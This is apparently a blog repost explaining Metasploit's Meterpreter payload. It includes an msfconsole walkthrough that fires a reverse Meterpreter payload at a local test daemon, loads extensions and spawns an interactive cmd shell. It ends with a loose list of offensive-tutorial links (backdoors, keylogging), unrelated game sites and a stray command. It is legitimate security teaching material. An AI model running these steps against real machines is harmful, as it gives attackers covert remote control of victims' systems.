Metasploit’s Meterpreter
is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely
in assembly.
The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
The are a few specific disadvantages associated with using the native command interpreter, such as /bin/sh. One such disadvantage is that the execution of the command interpreter typically
involves the creation of a new process in the task list, thus making the attacker visible for the duration of their connection.
In general, the execution of the native command interpreter is, depending on the context, already regarded as a red flag action for most applications and there are a number of Host-based Intrusion Prevention Systems (HIPS) that will readily detect and prevent such actions for both Windows and UNIX derived platforms.
meterpreter is capable of avoiding these three issues due to the way it has been implemented.
Firstly, meterpreter is able to avoid the creation of a new process because it executes in the context of the process that is ex-ploited. Furthermore, the meterpreter extensions, and the meterpreter server
itself, are all executed entirely from memory using the technique described in Remote Library Injection [1]. The fact that meterpreter runs in the context of the exploited process also allows it to avoid issues with chroot because it does not have to create a new process. In some cases the application being exploited can even continue to run after meterpreter has been injected. Finally,
and perhaps the best feature of all, meterpreter allows for incredible control and automation when it comes to writing extensions. Server extensions can be written in any language that can have code distributed as a shared object (DLL) form. This fact makes it no longer necessary to implement specially purposed position independent code in what typically requires a low-level language such
as assembly.
meterpreter also provides a default set of commands to illustrate some of the capabilities of the extension system. For instance, one of the extensions, Fs, allows for uploading and downloading files to and from the remote machine. Another extension, Net, allows for dynamically creating port forwards that are similar to SSH’s in that the port is forwarded locally on the client’s machine, through the established meterpreter connection, to a host on the server’s network. This enables the reaching hosts on the inside of the server’s network that might not be directly reachable from the client.
Meterpreter has been fully integrated into the Metasploit Framework in ver-sion 2.3 and can be accessed through a number of a different payloads. At the time of this writing meterpreter has only been implemented on Windows but its principals and design are fully portable to a variety of other operating sys-tems, including Linux. Meterpreter can be used with nearly all of the Windows
exploits included in Metasploit by selecting from one of the following payloads:
1. win32 bind meterpreter
This payload binds to a port on the target machine and waits for a connec-tion. After the connection is established the meterpreter server is uploaded and the existing connection is used for the meterpreter communication
channel.
2. win32 reverse meterpreter
This payload connects back to the attacker on a given port. The connec-tion is then used to upload the meterpreter server after which point it is used for the meterpreter communication channel.
3. win32 findrecv ord meterpreter
This payload searches for the file descriptor that the exploit was trig-gered from and uses it to upload the meterpreter server after which point the connection is used for the meterpreter communication channel. This payload is particularly intriguing because it does not require that a new connection be opened and thus bypasses all firewall configurations.
The first step is to start the Metasploit client interface. Though Metasploit provides a number of
interfaces (including msfweb), msfconsole will be used for illustration purposes.
$ ./msfconsole
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
+ -- --=[ msfconsole v2.3 [59 exploits - 73 payloads]
msf >
Once at the prompt, the first thing to do is pick an exploit. For sake of demon-stration the Tester exploit is going to be used which is simply an exploit that is used against a daemon that executes whatever code is thrown at it.
msf > use Tester
msf Tester >
After selecting the tester exploit, the next thing to do is select the payload that is to be used. For this demonstration the win32 reverse meterpreter payload will be used. Aside from the payload, it is also necessary to set variables that are required by the exploit and payload, such as RHOST and RPORT which represent the target host as well as LHOST and LPORT which are used by the payload when
connecting back to the attacker.
msf Tester > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf Tester(win32_reverse_meterpreter) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf Tester(win32_reverse_meterpreter) > set RPORT 12345
RPORT -> 12345
msf Tester(win32_reverse_meterpreter) > set LHOST 127.0.0.1
LHOST -> 127.0.0.1
msf Tester(win32_reverse_meterpreter) > set LPORT 5556
LPORT -> 5556
msf Tester(win32_reverse_meterpreter) >
Finally, with the payload and exploit defined, it’s time to fire up the engines!
msf Tester(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending 270 bytes to remote host.
[*] Got connection from 127.0.0.1:5556 <-> 127.0.0.1:2029
[*] Sending Stage (2835 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter>
And with that, the meterpreter connection is established and ready to be used.
The first order of business is to issue the help command to get a feel for what
features are available.
meterpreter> help
The most useful for the point of illustration is the use command. This command allows for
dynamically loading meterpreter extensions on the fly. These extensions are automatically uploaded to the target machine and loaded from memory. For example, one of the extensions allows for executing and killing processes, as well as getting a list of running processes. This extension is the Process extension which can be loaded by issuing the following command:
meterpreter> use -m Process
loadlib: Loading library from ’ext950591.dll’ on the remote machine.
meterpreter>
loadlib: success.
meterpreter>
After the extension has been loaded the new commands will be added to the help output. For the Process extension the new commands look like:
meterpreter> help
meterpreter> execute
Usage: execute -f file [ -a args ] [ -Hc ]
-f <file> The file name to execute
-a <args> The arguments to pass to the executable
-H Create the process hidden
-c Channelize the input and output
meterpreter> kill
Usage: kill pid1 pid2 pid3 ...
meterpreter>
The execute command is perhaps one of the more interesting as it allows for
executing a command, such as a real command interpreter. The input and output from the process can be piped to a channel that can be read from, written to, and interacted with. While the execution of a process does expose the attacker, it is nevertheless a potentially handy feature. The output below
illustrates executing a command interpreter and interacting with it:
meterpreter> execute -f cmd -c
execute: Executing ’cmd’...
meterpreter>
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>echo Meterpreter interactive channel in action
echo Meterpreter interactive channel in action
Meterpreter interactive channel in action
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y
meterpreter>
Aside from the Process extension, a number of other extensions exist that
provide other potentially useful commands. The entire extension system is easy
to modify and customize, thus allowing for more advanced extensions to be
written in the future. The following extensions are currently included:
1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.
apt-get update && apt-get upgrade
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
http://www.offensive-security.com/metasploit-unleashed/Client_Side_Exploits
http://www.offensive-security.com/metasploit-unleashed/Windows_Post_Capture_Modules
http://www.offensive-security.com/metasploit-unleashed/Windows_Post_Gather_Modules
http://www.offensive-security.com/metasploit-unleashed/Windows_Post_Manage_Modules
http://www.offensive-security.com/metasploit-unleashed/Binary_Payloads
http://www.offensive-security.com/metasploit-unleashed/Backdooring_EXE_Files
http://www.offensive-security.com/metasploit-unleashed/Keylogging
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Backdoor
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Service
http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts
http://www.gamesexcel.com/
http://mswordgames.iza-yoi.net/mode0w.html
http://www.offensive-security.com/metasploit-unleashed/Interacting_With_The_Registry
http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor
http://www.offensive-security.com/metasploit-unleashed/Enabling_Remote_Desktop
http://www.offensive-security.com/metasploit-unleashed/Packet_Sniffing
http://www.offensive-security.com/metasploit-unleashed/Portfwd
http://www.offensive-security.com/metasploit-unleashed/Screen_Capture
http://www.offensive-security.com/metasploit-unleashed/Searching_For_Content
http://www.offensive-security.com/metasploit-unleashed/VBScript_Infection_Methods
Unofficial fork of the Rapid7 metasploit-framework, pruned for minimal size
https://github.com/pwnieexpress/metasploit-framework
Poison Ivy 2.3.2 Server Buffer Overflow Exploit
http://www.0x50sec.org/poison-ivy-2-3-2-server-buffer-overflow-exploit/#more-1431
沒有留言:
張貼留言